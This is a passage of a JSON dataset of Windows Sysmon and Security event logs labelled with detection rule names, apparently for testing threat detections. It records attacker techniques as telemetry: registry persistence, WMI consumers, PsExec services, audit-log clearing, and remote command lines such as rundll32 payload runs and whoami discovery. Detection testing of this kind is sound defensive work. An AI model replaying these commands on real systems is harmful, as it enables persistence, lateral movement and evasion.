Mechanisms"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution_attributes":{"ProcessID":1828,"ThreadID":372},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution_attributes":{"ProcessID":2032,"ThreadID":2420},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult 
Malware"],"event":{"Event":{"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Remote PowerShell Session Host Process (WinRM)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote 
Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution_attributes":{"ProcessID":1792,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution_attributes":{"ProcessID":780,"ThreadID":3480},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution_attributes":{"ProcessID":3236,"ThreadID":4832},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 
22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution_attributes":{"ProcessID":3428,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution_attributes":{"ProcessID":420,"ThreadID":996},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 
23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution_attributes":{"ProcessID":856,"ThreadID":1660},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT 
AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 
20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 
20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 
20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo 